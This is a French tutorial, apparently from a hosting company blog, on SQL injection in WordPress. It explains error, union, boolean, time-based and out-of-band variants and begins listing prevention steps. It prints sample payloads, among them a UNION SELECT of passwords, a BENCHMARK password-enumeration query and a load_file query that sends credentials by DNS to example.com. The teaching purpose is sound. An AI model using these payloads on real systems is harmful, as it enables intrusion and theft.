{"id":26815,"date":"2023-09-26T14:43:24","date_gmt":"2023-09-26T14:43:24","guid":{"rendered":"\/tutoriels\/?p=26815"},"modified":"2024-12-18T21:08:52","modified_gmt":"2024-12-18T21:08:52","slug":"injection-sql-wordpress","status":"publish","type":"post","link":"\/fr\/tutoriels\/injection-sql-wordpress","title":{"rendered":"Comment pr\u00e9venir une attaque injection SQL sur WordPress (9 m\u00e9thodes)"},"content":{"rendered":"<p>L&rsquo;un des facteurs les plus critiques dans le d&eacute;veloppement d&rsquo;un site web est sa s&eacute;curit&eacute;. Si votre site subit une injection SQL WordPress, des pirates pourraient acc&eacute;der &agrave; des informations sensibles dans votre base de donn&eacute;es et les exploiter.<\/p><p>Heureusement, la pr&eacute;vention des attaques par injection SQL est plus simple que vous ne le pensez. Vous pouvez facilement prot&eacute;ger votre site en mettant &agrave; jour votre logiciel, en mettant en place un pare-feu ou en installant un plugin de s&eacute;curit&eacute; WordPress.<\/p><p>Dans cet article, nous allons expliquer ce qu&rsquo;est une injection SQL et comment elle peut se produire. Ensuite, nous vous montrerons comment stopper les attaques par injection SQL sur WordPress. C&rsquo;est parti !<\/p><figure class=\"wp-block-image size-full\"><a href=\"https:\/\/assets.hostinger.com\/content\/tutorials\/pdf\/Build-Website-in-9-Easy-Steps-FR.pdf\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"1024\" height=\"283\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/eBook_-Build-website-FR-1024x283-1.png\/public\" alt=\"\" class=\"wp-image-41463\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/eBook_-Build-website-FR-1024x283-1.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/eBook_-Build-website-FR-1024x283-1.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/eBook_-Build-website-FR-1024x283-1.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/eBook_-Build-website-FR-1024x283-1.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><h2 class=\"wp-block-heading\" id=\"h-introduction-a-l-injection-sql\"><strong>Introduction &agrave; l&rsquo;injection SQL<\/strong><\/h2><p>Avant de nous plonger dans l&rsquo;injection SQL, il est important de comprendre ce qu&rsquo;est le langage SQL. En bref, le langage de requ&ecirc;te structur&eacute; (&laquo; Structured Query Language &raquo;, SQL) est un<strong> langage de programmation<\/strong> utilis&eacute; pour interagir avec les bases de donn&eacute;es.<\/p><p>Dans WordPress, vous pouvez utiliser des <strong>requ&ecirc;tes SQL<\/strong> pour demander des donn&eacute;es &agrave; votre base de donn&eacute;es MySQL. Vous pouvez modifier les tables, ajouter de nouvelles donn&eacute;es et trier les r&eacute;sultats des donn&eacute;es &agrave; l&rsquo;aide de diff&eacute;rentes commandes.<\/p><p>Quand on parle d&rsquo;injection SQL (SQLi), cela signifie qu&rsquo;un code malveillant est inject&eacute; dans une application web. Les attaquants peuvent acc&eacute;der aux donn&eacute;es de la base de donn&eacute;es &agrave; l&rsquo;aide d&rsquo;instructions SQL nuisibles et m&ecirc;me les d&eacute;truire.<\/p><p>Les attaques par injection SQL se produisent depuis la fin des ann&eacute;es 90 et restent un probl&egrave;me courant. En 2023, cette technique figurait en troisi&egrave;me position sur la liste des dix <strong>principaux risques pour la s&eacute;curit&eacute; des applications web<\/strong>.<\/p><p>Bien qu&rsquo;il s&rsquo;agisse d&rsquo;un probl&egrave;me important, de nombreux sites et applications web ne mettent pas en &oelig;uvre de mesures efficaces pour pr&eacute;venir les attaques par injection SQL. Cela a conduit &agrave; plusieurs violations de donn&eacute;es, parfois &agrave; grande &eacute;chelle. Par exemple, l&rsquo;universit&eacute; de Stanford a subi une <strong>cyberattaque en 2020<\/strong> qui a compromis les donn&eacute;es de nombreux &eacute;tudiants.<\/p><p>En fin de compte, l&rsquo;injection SQL de WordPress peut avoir des cons&eacute;quences d&eacute;sastreuses pour votre site web. Si vous ne voulez pas que vos donn&eacute;es tombent entre de mauvaises mains, il est donc crucial de renforcer votre s&eacute;curit&eacute; en ligne autant que possible.<\/p><h2 class=\"wp-block-heading\" id=\"h-comment-fonctionne-l-injection-sql-sur-wordpress\"><strong>Comment fonctionne l&rsquo;injection SQL sur WordPress<\/strong><\/h2><p>Les attaques par injection SQL peuvent &ecirc;tre r&eacute;alis&eacute;es de diff&eacute;rentes mani&egrave;res. Elles peuvent impliquer :<\/p><ul class=\"wp-block-list\">\n<li><strong>La r&eacute;cup&eacute;ration non autoris&eacute;e de donn&eacute;es<\/strong>. Les attaquants peuvent manipuler une requ&ecirc;te SELECT pour r&eacute;cup&eacute;rer des donn&eacute;es et &laquo; vider &raquo; le contenu d&rsquo;une base de donn&eacute;es.<\/li>\n\n\n\n<li><strong>La modification des donn&eacute;es<\/strong>. Une SQLi peut &ecirc;tre utilis&eacute;e pour modifier les entr&eacute;es d&rsquo;une base de donn&eacute;es ou les autorisations d&rsquo;un compte.<\/li>\n\n\n\n<li><strong>Un d&eacute;ni de service (DoS)<\/strong>. Les attaques DoS emp&ecirc;chent les utilisateurs r&eacute;els de visiter votre site web. Les attaquants y parviennent en supprimant massivement le contenu de votre base de donn&eacute;es.<\/li>\n<\/ul><p>Il y a de fortes chances que votre site web contienne un formulaire qui recueille des informations aupr&egrave;s des visiteurs. Les pirates peuvent s&rsquo;en servir pour contourner les <strong><a href=\"\/fr\/tutoriels\/securiser-wordpress\">mesures de s&eacute;curit&eacute; de votre site web<\/a>.<\/strong><\/p><p>Si vous demandez &agrave; un utilisateur de saisir un nom d&rsquo;utilisateur, un mot de passe ou un num&eacute;ro de t&eacute;l&eacute;phone, il peut vous donner une instruction SQL malveillante &agrave; la place. Celle-ci s&rsquo;ex&eacute;cutera &agrave; votre insu dans votre base de donn&eacute;es, ce qui risque d&rsquo;exposer les donn&eacute;es de votre site.<\/p><p>Voici quelques points d&rsquo;entr&eacute;e courants pour les attaques SQLi :<\/p><ul class=\"wp-block-list\">\n<li>Les formulaires d&rsquo;inscription<\/li>\n\n\n\n<li>Les formulaires de connexion<\/li>\n\n\n\n<li>Les champs des commentaires<\/li>\n\n\n\n<li>Les paniers d&rsquo;achat<\/li>\n\n\n\n<li><strong>Les formulaires de contact<\/strong><\/li>\n<\/ul><p>Voici un exemple d&rsquo;instruction SQL normale pour s&eacute;lectionner un utilisateur sp&eacute;cifique avec un ID utilisateur donn&eacute; :<\/p><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"wp-block-preformatted\">txtUserId = getRequestString(\"UserId\");<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">txtSQL = \"SELECT * FROM Users WHERE UserId = \" + txtUserId;<\/pre>\n<\/div><\/div><p>Sans aucune directive sur les entr&eacute;es utilisateur, les attaquants SQLi peuvent modifier cette d&eacute;claration :<\/p><pre class=\"wp-block-preformatted\">SELECT * FROM Users WHERE UserId = 105 OR 1=1;<\/pre><p>Cela renverra toutes les lignes de la table &laquo; <strong>Utilisateurs <\/strong>&raquo;, exposant ainsi les informations de vos visiteurs. Les attaquants peuvent &eacute;galement potentiellement acc&eacute;der aux mots de passe :<\/p><pre class=\"wp-block-preformatted\">SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;<\/pre><p>En utilisant l&rsquo;injection SQL, les pirates peuvent d&eacute;couvrir les noms d&rsquo;utilisateur et les mots de passe de votre site web. Si vous g&eacute;rez un site de e-commerce par exemple, ces personnes malveillantes peuvent divulguer les donn&eacute;es de paiement de vos clients et d&rsquo;autres informations sensibles, ruinant ainsi votre r&eacute;putation en ligne.<\/p><h2 class=\"wp-block-heading\" id=\"h-les-types-d-attaques-par-injection-sql\"><strong>Les types d&rsquo;attaques par injection SQL<\/strong><\/h2><p>Maintenant que vous savez ce qu&rsquo;est une injection SQL et comment elle fonctionne, examinons les diff&eacute;rentes fa&ccedil;ons dont elle peut &ecirc;tre ex&eacute;cut&eacute;e. Vous serez ainsi mieux pr&eacute;par&eacute; pour vous d&eacute;fendre.<\/p><h3 class=\"wp-block-heading\" id=\"h-sqli-en-bande-in-band\"><strong>SQLi en bande (In-Band)<\/strong><\/h3><p>Un exemple d&rsquo;attaque par injection de code SQL est le SQLi en bande. Avec cette m&eacute;thode, l&rsquo;attaquant peut utiliser le m&ecirc;me canal pour ins&eacute;rer un code malveillant et recueillir les r&eacute;sultats.<\/p><p>Comme le SQLi en bande est simple et efficace, il s&rsquo;agit d&rsquo;un type d&rsquo;injection SQL tr&egrave;s r&eacute;pandu. Cependant, il existe deux variantes de SQLi en bande &ndash; <strong>bas&eacute;e sur les erreurs<\/strong> et <strong>bas&eacute;e sur l&rsquo;union<\/strong>.<\/p><p><strong>SQLi bas&eacute;e sur les erreurs<\/strong><\/p><p>Une attaque par injection SQL bas&eacute;e sur les erreurs est une technique qui force la base de donn&eacute;es &agrave; produire des <a href=\"https:\/\/www.sqlinjection.net\/http-errors\/\" target=\"_blank\" rel=\"noopener\"><strong>messages d&rsquo;erreur<\/strong><\/a>. Cela permet d&rsquo;obtenir des informations sur la structure de la base de donn&eacute;es.<\/p><p>Les attaquants peuvent y parvenir en utilisant une commande SQL dans un param&egrave;tre de champ d&rsquo;entr&eacute;e. Il peut s&rsquo;agir d&rsquo;un simple guillemet, d&rsquo;un double guillemet ou d&rsquo;op&eacute;rateurs tels que AND, OR ou NOT.<\/p><p>Par exemple, l&rsquo;URL d&rsquo;un site peut prendre un param&egrave;tre des visiteurs :<\/p><pre class=\"wp-block-preformatted\">https:\/\/www.example.org\/index.php?item=123<\/pre><p>Dans ce cas, les attaquants peuvent ajouter un guillemet simple &agrave; la fin du param&egrave;tre :<\/p><pre class=\"wp-block-preformatted\">https:\/\/www.example.org\/index.php?item=123&prime;<\/pre><p>Ce qui peut renvoyer une erreur contenant des informations sensibles :<\/p><p>Vous avez une erreur dans votre syntaxe SQL ; consultez le manuel correspondant &agrave; la version de votre serveur MySQL pour conna&icirc;tre la bonne syntaxe &agrave; utiliser pr&egrave;s de &nbsp;&raquo;VALUE&nbsp;&raquo;.<\/p><p>Voici les informations qu&rsquo;un pirate peut obtenir &agrave; partir de cette erreur :<\/p><ul class=\"wp-block-list\">\n<li>La confirmation que la base de donn&eacute;es utilise MySQL<\/li>\n\n\n\n<li>La syntaxe sp&eacute;cifique qui a provoqu&eacute; l&rsquo;erreur<\/li>\n\n\n\n<li>L&rsquo;endroit de la requ&ecirc;te o&ugrave; l&rsquo;erreur s&rsquo;est produite<\/li>\n<\/ul><p>Apr&egrave;s avoir re&ccedil;u cette erreur, les attaquants SQLi sauront que votre base de donn&eacute;es n&rsquo;est pas s&eacute;curis&eacute;e. Cela peut leur permettre de planifier d&rsquo;autres attaques par injection afin d&rsquo;obtenir des donn&eacute;es plus sensibles. Ils peuvent m&ecirc;me utiliser une commande comme grep extract pour automatiser les options de syntaxe SQL afin de localiser d&rsquo;autres erreurs.<\/p><p><strong>SQLi bas&eacute;e sur l&rsquo;union<\/strong><\/p><p>Une attaque par injection SQL bas&eacute;e sur l&rsquo;union est une technique qui utilise l&rsquo;op&eacute;rateur SQL UNION pour combiner deux ou plusieurs instructions SELECT dans une<strong> r&eacute;ponse HTTP<\/strong>. Cette r&eacute;ponse peut contenir des donn&eacute;es sensibles qui peuvent &ecirc;tre exploit&eacute;es.<\/p><p>Essentiellement, les attaquants utilisent le mot-cl&eacute; SQL UNION pour obtenir des donn&eacute;es suppl&eacute;mentaires par rapport &agrave; ce qui a &eacute;t&eacute; r&eacute;cup&eacute;r&eacute; dans une requ&ecirc;te initiale. Ce mot-cl&eacute; permet aux pirates d&rsquo;ajouter des requ&ecirc;tes SELECT suppl&eacute;mentaires &agrave; la requ&ecirc;te initiale.<\/p><p>Voici comment elle peut &ecirc;tre ex&eacute;cut&eacute;e :<\/p><p>SELECT a, b FROM table1 UNION SELECT c, d FROM table2<\/p><p>Cette requ&ecirc;te renverra les valeurs de deux colonnes dans un seul ensemble de r&eacute;sultats. Celui-ci contiendra les valeurs des colonnes A et B d&rsquo;une table, ainsi que les colonnes C et D d&rsquo;une autre table.<\/p><p>Pour que cette injection SQL fonctionne, quelques conditions doivent &ecirc;tre remplies :<\/p><ul class=\"wp-block-list\">\n<li>Chaque requ&ecirc;te doit renvoyer le m&ecirc;me nombre de colonnes.<\/li>\n\n\n\n<li>Le type de donn&eacute;es de chaque colonne doit &ecirc;tre compatible avec les requ&ecirc;tes.<\/li>\n<\/ul><p>Si ces deux conditions sont remplies, les attaquants seront en mesure de r&eacute;cup&eacute;rer les r&eacute;sultats de leur requ&ecirc;te inject&eacute;e. Apr&egrave;s avoir d&eacute;termin&eacute; le nombre de colonnes n&eacute;cessaires et le type de donn&eacute;es de l&rsquo;utilisateur, les pirates SQLi peuvent ensuite r&eacute;cup&eacute;rer le contenu des tables de votre base de donn&eacute;es.<\/p><p>Par exemple, la requ&ecirc;te originale peut renvoyer deux colonnes contenant des donn&eacute;es de type cha&icirc;ne. Si ces colonnes correspondent &agrave; des noms d&rsquo;utilisateur et &agrave; des mots de passe, les pirates peuvent soumettre cette entr&eacute;e :<\/p><p>&lsquo; UNION SELECT username, password FROM users&ndash;<\/p><p>Comme vous pouvez l&rsquo;imaginer, les r&eacute;sultats de ces requ&ecirc;tes peuvent avoir des cons&eacute;quences d&eacute;sastreuses. Les informations personnelles contenues sur votre site web peuvent alors &ecirc;tre consult&eacute;es et exploit&eacute;es de diverses mani&egrave;res.<\/p><h3 class=\"wp-block-heading\" id=\"h-sqli-inferentiel-inferential\"><strong>SQLi inf&eacute;rentiel (inferential)<\/strong><\/h3><p>L&rsquo;injection SQL inf&eacute;rentielle est commun&eacute;ment appel&eacute;e SQLi aveugle. Contrairement aux attaques en bande, aucune donn&eacute;e n&rsquo;est transf&eacute;r&eacute;e entre l&rsquo;application et le pirate. Au lieu de cela, l&rsquo;attaquant envoie plusieurs requ&ecirc;tes &agrave; la base de donn&eacute;es afin d&rsquo;observer le comportement des r&eacute;ponses.<\/p><p>En r&eacute;sum&eacute;, l&rsquo;attaque SQLi inf&eacute;rentielle consiste &agrave; &eacute;valuer la structure d&rsquo;une base de donn&eacute;es en notant la fa&ccedil;on dont elle r&eacute;pond &agrave; des donn&eacute;es sp&eacute;cifiques. Pour ce faire, les attaquants peuvent utiliser des techniques d&rsquo;injection SQL bas&eacute;es sur les bool&eacute;ens et sur le temps.<\/p><p><strong>SQLi bool&eacute;enne<\/strong><\/p><p>La m&eacute;thode d&rsquo;injection bas&eacute;e sur les bool&eacute;ens est un type de SQLi inf&eacute;rentiel. Un attaquant interroge la base de donn&eacute;es avec des questions de type VRAI ou FAUX et &eacute;value la r&eacute;ponse. Cette technique est souvent utilis&eacute;e lorsque l&rsquo;application n&rsquo;affiche que des messages d&rsquo;erreur g&eacute;n&eacute;riques.<\/p><p>L&rsquo;injection bool&eacute;enne prend beaucoup plus de temps pour atteindre son objectif. Comme la base de donn&eacute;es n&rsquo;envoie pas de donn&eacute;es &agrave; la page web, l&rsquo;attaquant vole des donn&eacute;es en examinant les r&eacute;ponses aux questions VRAI ou FAUX. Cela peut lui permettre de savoir si la base de donn&eacute;es est vuln&eacute;rable &agrave; une injection SQL aveugle.<\/p><p>Par exemple, les pirates peuvent injecter une requ&ecirc;te malveillante qui renvoie un r&eacute;sultat FAUX :<\/p><pre class=\"wp-block-preformatted\">http:\/\/example.com\/items.php?id=2 and 1=2<\/pre><p>Si l&rsquo;application ne renvoie pas de r&eacute;sultat, elle est probablement vuln&eacute;rable &agrave; l&rsquo;injection SQL. Pour s&rsquo;en assurer, les attaquants injectent g&eacute;n&eacute;ralement des requ&ecirc;tes qui renvoient un r&eacute;sultat VRAI :<\/p><pre class=\"wp-block-preformatted\">http:\/\/newspaper.com\/items.php?id=2 and 1=1<\/pre><p>L&rsquo;attaquant peut distinguer les retours VRAI et FAUX lorsque le contenu est diff&eacute;rent pour chaque r&eacute;ponse. Cela peut lui permettre d&rsquo;exploiter la base de donn&eacute;es.<\/p><p><strong>SQLi bas&eacute;e sur le temps<\/strong><\/p><p>Une autre fa&ccedil;on de d&eacute;terminer si une base de donn&eacute;es est vuln&eacute;rable &agrave; une injection SQL est d&rsquo;utiliser une attaque bas&eacute;e sur le temps. Ce type d&rsquo;injection force un d&eacute;lai avant l&rsquo;ex&eacute;cution des requ&ecirc;tes.<\/p><p>En fonction du temps de r&eacute;ponse, les attaquants peuvent &eacute;valuer si le r&eacute;sultat est VRAI ou FAUX. La connaissance de cette information peut leur permettre d&rsquo;ex&eacute;cuter des requ&ecirc;tes suppl&eacute;mentaires.<\/p><p>Si une attaque bas&eacute;e sur le temps est effectu&eacute;e sur une base de donn&eacute;es MySQL, elle utilise probablement la fonction sleep. Cette fonction demande &agrave; la base de donn&eacute;es de retarder l&rsquo;ex&eacute;cution de la requ&ecirc;te pendant un certain temps :<\/p><pre class=\"wp-block-preformatted\">select * from comments<\/pre><pre class=\"wp-block-preformatted\">WHERE post_id=1-SLEEP(15);<\/pre><p>Lorsque la r&eacute;ponse est retard&eacute;e avec succ&egrave;s, l&rsquo;attaquant sait alors que l&rsquo;injection SQL est possible. Cela confirmera que le serveur web est une base de donn&eacute;es MySQL, ce qui conduira &agrave; des injections de charge utile plus complexes.<\/p><p>Par exemple, les attaquants peuvent utiliser ce d&eacute;lai pour confirmer les donn&eacute;es dans une base de donn&eacute;es. Ils peuvent &eacute;num&eacute;rer chaque lettre en demandant &agrave; la base de donn&eacute;es de s&rsquo;arr&ecirc;ter pendant un certain temps.<\/p><p>Pour les bases de donn&eacute;es MySQL, vous pouvez impl&eacute;menter l&rsquo;op&eacute;ration BENCHMARK() pour retarder les r&eacute;ponses si l&rsquo;expression est vraie. Voici un exemple de fonctionnement :<\/p><pre class=\"wp-block-preformatted\">1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;<\/pre><p>S&rsquo;il y a un d&eacute;lai important dans la r&eacute;ponse, les attaquants peuvent supposer que le premier caract&egrave;re du mot de passe pour user_id = 1 est le caract&egrave;re &ldquo;2&rdquo;. En utilisant cette m&eacute;thode, ils peuvent &eacute;num&eacute;rer tous les mots de passe stock&eacute;s dans votre base de donn&eacute;es.<\/p><h3 class=\"wp-block-heading\" id=\"h-sqli-hors-bande-out-of-band\"><strong>SQLi hors bande (Out-of-Band)<\/strong><\/h3><p>Une injection SQL hors bande signifie que l&rsquo;attaquant n&rsquo;a pas pu recevoir de r&eacute;ponse de l&rsquo;injection sur le m&ecirc;me canal que celui qu&rsquo;il a demand&eacute;. Au lieu de cela, il peut forcer l&rsquo;application &agrave; envoyer les donn&eacute;es demand&eacute;es &agrave; un point de terminaison distant et contr&ocirc;l&eacute;.<\/p><p>Souvent, l&rsquo;injection SQL hors bande peut &ecirc;tre une alternative efficace aux attaques inf&eacute;rentielles. Toutefois, cette technique n&rsquo;est possible que si le serveur dispose de commandes qui d&eacute;clenchent des requ&ecirc;tes DNS ou HTTP. Heureusement pour eux, ces commandes sont courantes sur les serveurs SQL les plus r&eacute;pandus.<\/p><p>Le serveur MySQL 5.5.52 et les versions inf&eacute;rieures d&eacute;marrent automatiquement avec une variable syst&egrave;me globale<strong> secure_file_priv<\/strong> vide. Dans ce cas, les attaquants hors bande peuvent exfiltrer les donn&eacute;es et cr&eacute;er une requ&ecirc;te vers un nom de domaine avec une fonction<strong> load_file<\/strong>. Cela permettra de r&eacute;cup&eacute;rer les donn&eacute;es exfiltr&eacute;es dans la requ&ecirc;te.<\/p><p>Les pirates peuvent y parvenir en ex&eacute;cutant cette requ&ecirc;te SQL :<\/p><pre class=\"wp-block-preformatted\">SELECT load_file(CONCAT('\\\\\\\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',example.com\\\\test.txt'))<\/pre><p>En cons&eacute;quence, l&rsquo;application enverra une requ&ecirc;te DNS au domaine inclus. Cela peut exposer des d&eacute;tails sensibles tels que la version de votre base de donn&eacute;es, les noms d&rsquo;utilisateur et les mots de passe.<\/p><h2 class=\"wp-block-heading\" id=\"h-quelle-est-la-frequence-des-attaques-d-injection-sql-sur-wordpress\"><strong>Quelle est la fr&eacute;quence des attaques d&rsquo;injection SQL sur WordPress ?<\/strong><\/h2><p>Si vous construisez un site WordPress, il est important de savoir si vous devez vous pr&eacute;occuper de l&rsquo;injection SQL. Malheureusement, l&rsquo;injection SQL est un moyen assez courant pour les pirates de compromettre ce <a href=\"\/fr\/tutoriels\/quest-ce-quun-cms\"><strong>syst&egrave;me de gestion de contenu (CMS)<\/strong><\/a>.<\/p><p>Selon le rapport iThemes <a href=\"\/fr\/tutoriels\/problemes-securite-wordpress\"><strong>sur la vuln&eacute;rabilit&eacute; de WordPress<\/strong><\/a>, les attaques par injection SQL repr&eacute;sentaient 9,3 % de toutes les menaces de s&eacute;curit&eacute; en 2021. Bien que des facteurs tels que les requ&ecirc;tes de script et de falsification intersites aient &eacute;t&eacute; plus fr&eacute;quents, il est imp&eacute;ratif de ne pas n&eacute;gliger les menaces SQLi.<\/p><p>WordPress stocke toutes les informations de votre site web dans une base de donn&eacute;es SQL. Cela inclut vos commentaires, vos articles, les informations sur vos clients, et bien plus encore. De plus, WordPress fonctionne en <strong>PHP<\/strong>, qui s&rsquo;int&egrave;gre &agrave; SQL. &Eacute;tant donn&eacute; que SQL fait partie int&eacute;grante de WordPress, vous &ecirc;tes certainement vuln&eacute;rable aux attaques par injection SQL.<\/p><p>En g&eacute;n&eacute;ral, l&rsquo;injection SQL sur WordPress est ex&eacute;cut&eacute;e par le biais de formulaires. Les attaquants peuvent exploiter ce processus lorsque les utilisateurs soumettent des donn&eacute;es &agrave; un script PHP contenant une requ&ecirc;te SQL. En tant que propri&eacute;taire d&rsquo;un site WordPress, il est important de maximiser votre s&eacute;curit&eacute; pour &eacute;viter ce probl&egrave;me.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/www.hostinger.com\/fr\/hebergement-wordpress\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"300\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/public\" alt=\"\" class=\"wp-image-41453\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><\/div><h2 class=\"wp-block-heading\" id=\"h-comment-bloquer-l-injection-sql-dans-wordpress-9-methodes\"><strong>Comment bloquer l&rsquo;injection SQL dans WordPress (9 m&eacute;thodes)<\/strong><\/h2><p>Si votre site web pr&eacute;sente une vuln&eacute;rabilit&eacute; aux injections SQL, cela signifie que les attaquants peuvent acc&eacute;der, modifier ou supprimer des donn&eacute;es dans votre base de donn&eacute;es. Heureusement, vous pouvez mettre en &oelig;uvre plusieurs pratiques de s&eacute;curit&eacute; pour augmenter la <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/securiser-wordpress\"><strong>s&eacute;curit&eacute; de WordPress<\/strong><\/a> et &eacute;viter une attaque SQL.<\/p><h3 class=\"wp-block-heading\" id=\"h-1-mettez-en-place-un-pare-feu\"><strong>1. Mettez en place un pare-feu<\/strong><\/h3><p>L&rsquo;une des meilleures fa&ccedil;ons de s&eacute;curiser votre site web contre les attaques SQLi est de mettre en place un pare-feu d&rsquo;application web (WAF). Un pare-feu est un syst&egrave;me de s&eacute;curit&eacute; qui surveille le trafic r&eacute;seau et bloque les activit&eacute;s suspectes. Il peut prot&eacute;ger votre site contre les injections SQL, les falsifications intersites, les scripts intersites, l&rsquo;inclusion de fichiers, etc.<\/p><p><a href=\"https:\/\/www.cloudflare.com\/waf\/\" target=\"_blank\" rel=\"noopener\"><strong>Cloudflare<\/strong><\/a> est un service gratuit qui fournit un pare-feu d&rsquo;application web puissant pour votre site internet. Cet outil peut d&eacute;tecter automatiquement plusieurs variantes d&rsquo;attaques SQLi.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"567\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Cloudflare-application-web.png\/public\" alt=\"Page d'accueil du pare-feu applicatif web de Cloudflare\" class=\"wp-image-37092\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Cloudflare-application-web.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Cloudflare-application-web.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Cloudflare-application-web.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Cloudflare-application-web.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><h3 class=\"wp-block-heading\" id=\"h-2-changez-le-prefixe-de-la-base-de-donnees-de-wordpress\"><strong>2. Changez le pr&eacute;fixe de la base de donn&eacute;es de WordPress<\/strong><\/h3><p>Lorsque vous <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/installer-wordpress\"><strong>installez WordPress<\/strong><\/a>, pour la premi&egrave;re fois, le pr&eacute;fixe de la base de donn&eacute;es est automatiquement <strong>&ldquo;wp_.&rdquo;<\/strong> Cette option par d&eacute;faut peut faciliter l&rsquo;acc&egrave;s des pirates &agrave; vos donn&eacute;es. Si vous ne r&eacute;initialisez pas le pr&eacute;fixe, les pirates peuvent facilement deviner les tables de votre base de donn&eacute;es.<\/p><p>Vous pouvez rapidement modifier le pr&eacute;fixe de votre base de donn&eacute;es, mais n&rsquo;oubliez pas de <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/bckup-wp\"><strong>faire une sauvegarde de votre site WordPress<\/strong><\/a> au pr&eacute;alable :<\/p><ul class=\"wp-block-list\">\n<li>Si vous avez un compte Hostinger, connectez-vous au tableau de bord hPanel et ouvrez votre <strong>gestionnaire de fichiers<\/strong>.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"729\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-dashboard-filemanager-highlighted-fr.png\/public\" alt=\"La page de pr&eacute;sentation de hPanel. Le bouton Gestionnaire de fichiers est en surbrillance\" class=\"wp-image-24231\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-dashboard-filemanager-highlighted-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-dashboard-filemanager-highlighted-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-dashboard-filemanager-highlighted-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-dashboard-filemanager-highlighted-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Cliquez sur le dossier <strong>public_html <\/strong>et ouvrez le fichier <strong>wp-config.php<\/strong>.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"451\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/05\/gestionnaire-de-fichiers-wpconfig-selectionne.png\/public\" alt=\"Gestionnaire de fichiers Hostinger. Le fichier wp-config.php est mis en &eacute;vidence\" 